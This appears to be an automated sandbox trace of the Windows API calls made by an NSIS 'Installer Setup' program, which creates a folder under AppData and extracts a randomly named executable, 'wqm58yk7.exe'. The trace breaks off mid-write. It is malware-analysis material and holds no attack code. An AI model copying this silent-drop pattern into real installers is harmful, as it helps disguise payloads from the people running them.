[0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.025] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.026] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.026] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.026] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.026] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x200, lpOverlapped=0x0) returned 1 [0050.026] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x8000, lpOverlapped=0x0) returned 1 [0050.030] GetTickCount () returned 0x1146049 [0050.030] ReadFile (in: hFile=0x17c, lpBuffer=0x415420, nNumberOfBytesToRead=0x51ea, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x18fda8*=0x51ea, lpOverlapped=0x0) returned 1 [0050.030] GetTickCount () returned 0x1146049 [0050.030] SetFilePointer (in: hFile=0x17c, lDistanceToMove=90602, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x161ea [0050.030] ReadFile (in: hFile=0x17c, lpBuffer=0x18fdf4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fda8, lpOverlapped=0x0 | out: lpBuffer=0x18fdf4*, lpNumberOfBytesRead=0x18fda8*=0x4, lpOverlapped=0x0) returned 1 [0050.030] SetFilePointer (in: hFile=0x17c, lDistanceToMove=36380, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e1c [0050.030] ReadFile (in: hFile=0x17c, lpBuffer=0x18fdb4, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x18fdb4*, lpNumberOfBytesRead=0x18fd30*=0x4, lpOverlapped=0x0) returned 1 [0050.030] GetTickCount () returned 0x1146049 [0050.031] ReadFile (in: hFile=0x17c, lpBuffer=0x41d428, nNumberOfBytesToRead=0x275, lpNumberOfBytesRead=0x18fd30, lpOverlapped=0x0 | out: lpBuffer=0x41d428*, lpNumberOfBytesRead=0x18fd30*=0x275, lpOverlapped=0x0) returned 1 [0050.031] GetTickCount () returned 0x1146049 [0050.031] SetFilePointer (in: hFile=0x17c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9095 [0050.032] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0050.032] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultUILanguage") returned 0x76d444ab [0050.032] GetUserDefaultUILanguage () returned 0x409 [0050.032] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0050.032] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0050.032] lstrlenA (lpString="Installer") returned 9 [0050.032] lstrcpynA (in: lpString1=0x42ec00, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.032] SetWindowTextA (hWnd=0x0, lpString="Installer Setup") returned 0 [0050.032] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0050.033] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0050.033] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x42e3a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0050.035] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0050.035] lstrcpynA (in: lpString1=0x435400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.035] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x30247 [0050.036] wsprintfA (in: param_1=0x436000, param_2="%d" | out: param_1="1033") returned 4 [0050.037] lstrlenA (lpString="Installer") returned 9 [0050.037] lstrcpynA (in: lpString1=0x42ec00, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.037] SetWindowTextA (hWnd=0x0, lpString="Installer Setup") returned 0 [0050.037] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0050.037] GetSystemDirectoryA (in: lpBuffer=0x18fca8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0050.037] wsprintfA (in: param_1=0x18fcbb, param_2="%s%s.dll" | out: param_1="\\RichEd20.dll") returned 13 [0050.037] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x75030000 [0050.632] GetClassInfoA (in: hInstance=0x0, lpClassName="RichEdit20A", lpWndClass=0x42eba0 | out: lpWndClass=0x42eba0) returned 1 [0050.633] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x403bca, dwInitParam=0x0) returned 0x0 [0050.651] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1) returned 0x50114 [0050.651] GetDlgItem (hDlg=0x6011a, nIDDlgItem=2) returned 0x9010e [0050.651] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=1028, lpString="Nullsoft Install System v3.05") returned 1 [0050.651] SetClassLongA (hWnd=0x6011a, nIndex=-14, dwNewLong=197191) returned 0x0 [0050.653] lstrcpynA (in: lpString1=0x437800, lpString2="Click Next to continue.", iMaxLength=1024 | out: lpString1="Click Next to continue.") returned="Click Next to continue." [0050.653] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=1, lpString="&Close") returned 1 [0050.653] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=3, lpString="") returned 1 [0050.653] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=2, lpString="Cancel") returned 1 [0050.653] GetDlgItem (hDlg=0x6011a, nIDDlgItem=3) returned 0x50116 [0050.653] ShowWindow (hWnd=0x50116, nCmdShow=0) returned 0 [0050.653] EnableWindow (hWnd=0x50116, bEnable=0) returned 0 [0050.653] EnableWindow (hWnd=0x50114, bEnable=0) returned 0 [0050.653] EnableWindow (hWnd=0x9010e, bEnable=0) returned 0 [0050.653] GetSystemMenu (hWnd=0x6011a, bRevert=0) returned 0xa023b [0050.653] EnableMenuItem (hMenu=0xa023b, uIDEnableItem=0xf060, uEnable=0x1) returned 0 [0050.653] SendMessageA (hWnd=0x50116, Msg=0xf4, wParam=0x0, lParam=0x1) returned 0x0 [0050.654] SendMessageA (hWnd=0x6011a, Msg=0x28, wParam=0x50114, lParam=0x1) returned 0x1 [0050.654] lstrlenA (lpString="Installer") returned 9 [0050.654] lstrcpynA (in: lpString1=0x42ec00, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.654] SetWindowTextA (hWnd=0x0, lpString="Installer Setup") returned 0 [0050.654] lstrcpynA (in: lpString1=0x42a870, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.654] lstrlenA (lpString="Installer Setup") returned 15 [0050.654] lstrcpynA (in: lpString1=0x42a87f, lpString2=": Installing", iMaxLength=1024 | out: lpString1=": Installing") returned=": Installing" [0050.654] SetWindowTextA (hWnd=0x6011a, lpString="Installer Setup: Installing") returned 1 [0050.654] DestroyWindow (hWnd=0x0) returned 0 [0050.654] CreateDialogParamA (hInstance=0x400000, lpTemplateName=0x6a, hWndParent=0x6011a, lpDialogFunc=0x405275, dwInitParam=0x5d4ab4) returned 0x3015e [0050.677] GetDlgItem (hDlg=0x3015e, nIDDlgItem=1027) returned 0x4029a [0050.678] GetDlgItem (hDlg=0x3015e, nIDDlgItem=1006) returned 0x202a8 [0050.678] GetDlgItem (hDlg=0x3015e, nIDDlgItem=1016) returned 0x202a6 [0050.678] SendMessageA (hWnd=0x6011a, Msg=0x28, wParam=0x4029a, lParam=0x1) returned 0x1 [0050.717] GetClientRect (in: hWnd=0x202a6, lpRect=0x18f6f0 | out: lpRect=0x18f6f0) returned 1 [0050.717] GetSystemMetrics (nIndex=2) returned 17 [0050.717] SendMessageA (hWnd=0x202a6, Msg=0x101b, wParam=0x0, lParam=0x18f6d0) returned 0x0 [0050.720] SendMessageA (hWnd=0x202a6, Msg=0x1036, wParam=0x4000, lParam=0x4000) returned 0x0 [0050.722] SendMessageA (hWnd=0x202a6, Msg=0x1001, wParam=0x0, lParam=0x0) returned 0x1 [0050.722] SendMessageA (hWnd=0x202a6, Msg=0x1026, wParam=0x0, lParam=0x0) returned 0x1 [0050.722] SendMessageA (hWnd=0x202a6, Msg=0x1024, wParam=0x0, lParam=0xff00) returned 0x1 [0050.722] SetDlgItemTextA (hDlg=0x3015e, nIDDlgItem=1027, lpString="Show &details") returned 1 [0050.722] GetDlgItem (hDlg=0x3015e, nIDDlgItem=1004) returned 0x40278 [0050.722] SendMessageA (hWnd=0x40278, Msg=0x401, wParam=0x0, lParam=0x75300000) returned 0x640000 [0050.722] SetDlgItemTextA (hDlg=0x3015e, nIDDlgItem=1006, lpString="") returned 1 [0050.722] GetDlgItem (hDlg=0x6011a, nIDDlgItem=1018) returned 0x5015a [0050.722] GetWindowRect (in: hWnd=0x5015a, lpRect=0x18fa54 | out: lpRect=0x18fa54) returned 1 [0050.722] ScreenToClient (in: hWnd=0x6011a, lpPoint=0x18fa54 | out: lpPoint=0x18fa54) returned 1 [0050.722] SetWindowPos (hWnd=0x3015e, hWndInsertAfter=0x0, X=11, Y=10, cx=0, cy=0, uFlags=0x15) returned 1 [0050.723] ShowWindow (hWnd=0x3015e, nCmdShow=8) returned 0 [0050.723] SendMessageA (hWnd=0x3015e, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0050.723] GetDlgItem (hDlg=0x3015e, nIDDlgItem=1004) returned 0x40278 [0050.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405209, lpParameter=0x40278, dwCreationFlags=0x0, lpThreadId=0x18f80c | out: lpThreadId=0x18f80c*=0x67c) returned 0x1a4 [0050.724] CloseHandle (hObject=0x1a4) returned 1 [0050.725] ShowWindow (hWnd=0x6011a, nCmdShow=10) returned 0 [0050.741] GetWindowLongA (hWnd=0x6011a, nIndex=-21) returned 0 [0050.741] SetWindowPos (hWnd=0x0, hWndInsertAfter=0x6011a, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 0 [0050.748] GetWindowLongA (hWnd=0x6011a, nIndex=-21) returned 0 [0050.749] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.750] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.783] GetWindowLongA (hWnd=0x9010e, nIndex=-21) returned 0 [0050.783] GetWindowLongA (hWnd=0x9010e, nIndex=-21) returned 0 [0050.783] GetWindowLongA (hWnd=0x30160, nIndex=-21) returned 0 [0050.785] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.785] GetWindowLongA (hWnd=0x4029a, nIndex=-21) returned 0 [0050.785] GetWindowLongA (hWnd=0x4029a, nIndex=-21) returned 0 [0050.834] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.838] GetWindowLongA (hWnd=0x6011a, nIndex=-21) returned 0 [0050.839] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.840] GetWindowLongA (hWnd=0x9010e, nIndex=-21) returned 0 [0050.843] GetWindowLongA (hWnd=0x3015c, nIndex=-21) returned 0 [0050.843] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.845] GetWindowLongA (hWnd=0x30160, nIndex=-21) returned 0 [0050.846] GetWindowLongA (hWnd=0x3015e, nIndex=-21) returned 0 [0050.847] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.856] GetWindowLongA (hWnd=0x2027c, nIndex=-21) returned 0 [0050.856] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.857] GetWindowLongA (hWnd=0x4029a, nIndex=-21) returned 0 [0050.862] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.878] ShowWindow (hWnd=0x6011a, nCmdShow=8) returned 1 [0050.879] SetWindowPos (hWnd=0x0, hWndInsertAfter=0x6011a, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 0 [0050.882] lstrcpynA (in: lpString1=0x42a050, lpString2="Completed", iMaxLength=1024 | out: lpString1="Completed") returned="Completed" [0050.882] lstrlenA (lpString="Completed") returned 9 [0050.882] SetWindowTextA (hWnd=0x202a8, lpString="Completed") returned 1 [0050.882] GetWindowLongA (hWnd=0x202a8, nIndex=-21) returned 0 [0050.882] SendMessageA (hWnd=0x202a6, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x3 [0050.882] SendMessageA (hWnd=0x202a6, Msg=0x1007, wParam=0x0, lParam=0x18f988) returned 0x3 [0050.882] SendMessageA (hWnd=0x202a6, Msg=0x1013, wParam=0x3, lParam=0x0) returned 0x1 [0050.882] SendMessageA (hWnd=0x6011a, Msg=0x408, wParam=0x1, lParam=0x0) returned 0x0 [0050.882] SendMessageA (hWnd=0x3015e, Msg=0x40b, wParam=0x0, lParam=0x0) returned 0x0 [0050.882] lstrcpynA (in: lpString1=0x437800, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0050.882] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=1, lpString="&Close") returned 1 [0050.883] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.883] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.883] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=3, lpString="< &Back") returned 1 [0050.883] SetDlgItemTextA (hDlg=0x6011a, nIDDlgItem=2, lpString="Cancel") returned 1 [0050.883] GetWindowLongA (hWnd=0x9010e, nIndex=-21) returned 0 [0050.884] GetWindowLongA (hWnd=0x9010e, nIndex=-21) returned 0 [0050.884] GetDlgItem (hDlg=0x6011a, nIDDlgItem=3) returned 0x50116 [0050.884] ShowWindow (hWnd=0x50116, nCmdShow=8) returned 0 [0050.884] GetWindowLongA (hWnd=0x6011a, nIndex=-21) returned 0 [0050.885] EnableWindow (hWnd=0x50116, bEnable=0) returned 1 [0050.885] EnableWindow (hWnd=0x50114, bEnable=1) returned 1 [0050.885] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.885] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.885] EnableWindow (hWnd=0x9010e, bEnable=0) returned 1 [0050.886] GetSystemMenu (hWnd=0x6011a, bRevert=0) returned 0xa023b [0050.886] EnableMenuItem (hMenu=0xa023b, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0050.886] SendMessageA (hWnd=0x50116, Msg=0xf4, wParam=0x0, lParam=0x1) returned 0x0 [0050.886] SendMessageA (hWnd=0x6011a, Msg=0x28, wParam=0x50114, lParam=0x1) returned 0x1 [0050.886] GetWindowLongA (hWnd=0x4029a, nIndex=-21) returned 0 [0050.886] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.887] lstrlenA (lpString="Installer") returned 9 [0050.887] lstrcpynA (in: lpString1=0x42ec00, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.887] SetWindowTextA (hWnd=0x0, lpString="Installer Setup") returned 0 [0050.887] lstrcpynA (in: lpString1=0x42a870, lpString2="Installer Setup", iMaxLength=1024 | out: lpString1="Installer Setup") returned="Installer Setup" [0050.887] lstrlenA (lpString="Installer Setup") returned 15 [0050.887] lstrcpynA (in: lpString1=0x42a87f, lpString2=": Completed", iMaxLength=1024 | out: lpString1=": Completed") returned=": Completed" [0050.887] SetWindowTextA (hWnd=0x6011a, lpString="Installer Setup: Completed") returned 1 [0050.888] DestroyWindow (hWnd=0x3015e) returned 1 [0050.888] GetWindowLongA (hWnd=0x6011a, nIndex=-21) returned 0 [0050.891] EndDialog (hDlg=0x6011a, nResult=0x0) returned 1 [0050.891] GetWindowLongA (hWnd=0x50114, nIndex=-21) returned 0 [0050.926] SetWindowPos (hWnd=0x0, hWndInsertAfter=0x6011a, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 0 [0050.933] CloseHandle (hObject=0x17c) returned 1 [0050.933] lstrcpynA (in: lpString1=0x42bc78, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0050.933] OleUninitialize () [0050.934] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x5e0 Thread: id = 3 os_tid = 0x90 Thread: id = 4 os_tid = 0x67c [0050.761] OleInitialize (pvReserved=0x0) returned 0x0 [0050.763] SendMessageA (hWnd=0x3015e, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0050.788] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.828] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 57 [0050.828] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.828] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0050.828] GetLastError () returned 0xb7 [0050.828] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0050.828] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), lpSecurityAttributes=0x0) returned 0 [0050.829] GetLastError () returned 0xb7 [0050.829] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz")) returned 0x10 [0050.829] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), lpSecurityAttributes=0x0) returned 0 [0050.829] GetLastError () returned 0xb7 [0050.829] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata")) returned 0x2012 [0050.829] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0050.829] GetLastError () returned 0xb7 [0050.829] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local")) returned 0x2010 [0050.829] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs"), lpSecurityAttributes=0x0) returned 1 [0050.830] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp"), lpSecurityAttributes=0x0) returned 1 [0050.830] lstrcpynA (in: lpString1=0x42a050, lpString2="Output folder: ", iMaxLength=1024 | out: lpString1="Output folder: ") returned="Output folder: " [0050.831] lstrlenA (lpString="Output folder: ") returned 15 [0050.831] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 57 [0050.831] lstrcatA (in: lpString1="Output folder: ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" | out: lpString1="Output folder: C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="Output folder: C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.831] SetWindowTextA (hWnd=0x202a8, lpString="Output folder: C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 1 [0050.837] SendMessageA (hWnd=0x202a6, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x0 [0050.838] SendMessageA (hWnd=0x202a6, Msg=0x1007, wParam=0x0, lParam=0x322fd4c) returned 0x0 [0050.839] SendMessageA (hWnd=0x202a6, Msg=0x1013, wParam=0x0, lParam=0x0) returned 0x1 [0050.840] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.840] SetCurrentDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 1 [0050.840] MulDiv (nNumber=1, nNumerator=30000, nDenominator=3) returned 10000 [0050.840] SendMessageA (hWnd=0x40278, Msg=0x402, wParam=0x2710, lParam=0x0) returned 0x0 [0050.842] lstrcpynA (in: lpString1=0x40b018, lpString2="wqm58yk7.exe", iMaxLength=1024 | out: lpString1="wqm58yk7.exe") returned="wqm58yk7.exe" [0050.842] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" [0050.842] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 57 [0050.842] lstrcatA (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" [0050.842] lstrcatA (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\", lpString2="wqm58yk7.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" [0050.842] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 0xffffffff [0050.842] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe")) returned 0xffffffff [0050.842] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp\\wqm58yk7.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c [0050.843] lstrcpynA (in: lpString1=0x42a050, lpString2="Extract: ", iMaxLength=1024 | out: lpString1="Extract: ") returned="Extract: " [0050.843] lstrlenA (lpString="Extract: ") returned 9 [0050.843] lstrlenA (lpString="wqm58yk7.exe") returned 12 [0050.843] lstrcatA (in: lpString1="Extract: ", lpString2="wqm58yk7.exe" | out: lpString1="Extract: wqm58yk7.exe") returned="Extract: wqm58yk7.exe" [0050.843] SetWindowTextA (hWnd=0x202a8, lpString="Extract: wqm58yk7.exe") returned 1 [0050.844] SendMessageA (hWnd=0x202a6, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x1 [0050.845] SendMessageA (hWnd=0x202a6, Msg=0x1007, wParam=0x0, lParam=0x322fd54) returned 0x1 [0050.846] SendMessageA (hWnd=0x202a6, Msg=0x1013, wParam=0x1, lParam=0x0) returned 0x1 [0050.847] SetFilePointer (in: hFile=0x17c, lDistanceToMove=37013, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9095 [0050.847] ReadFile (in: hFile=0x17c, lpBuffer=0x322fd90, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x322fd0c, lpOverlapped=0x0 | out: lpBuffer=0x322fd90*, lpNumberOfBytesRead=0x322fd0c*=0x4, lpOverlapped=0x0) returned 1 [0050.847] GetTickCount () returned 0x1146153 [0050.848] ReadFile (in: hFile=0x17c, lpBuffer=0x41d428, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x322fd0c, lpOverlapped=0x0 | out: lpBuffer=0x41d428*, lpNumberOfBytesRead=0x322fd0c*=0x4000, lpOverlapped=0x0) returned 1 [0050.850] GetTickCount () returned 0x1146153 [0050.850] WriteFile (in: hFile=0x1c, lpBuffer=0x421428*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x322fd18, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesWritten=0x322fd18*=0x8000, lpOverlapped=0x0) returned 1 [0050.852] GetTickCount () returned 0x1146153 [0050.852] WriteFile (in: hFile=0x1c, lpBuffer=0x421428*, nNumberOfBytesToWrite=0x4648, lpNumberOfBytesWritten=0x322fd18, lpOverlapped=0x0 | out: lpBuffer=0x421428*, lpNumberOfBytesWritten=0x322fd18*=0x4648, lpOverlapped=0x0) returned 1 [0050.853] GetTickCount () returned 0x1146162 [0050.853] ReadFile (in: hFile=0x17c, lpBuffer=0x41d428, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x322fd0c, lpOverlapped=0x0 | out: lpBuffer=0x41d428*, lpNumberOfBytesRead=0x322fd0c*=0x4000, lpOverlapped=0x0) returned 1 [0050.853] GetTickCount () returned 0x1146162 [0050.853] WriteFile (in: hFile=0x1c, lpBuffer=0x421428*, nNumberOfBytesToWrite=0x6b71, lpNumberOfBytesWritten=0x322fd18, lpOverlapped=0x0 | out: lpBuffer=0x421428*, 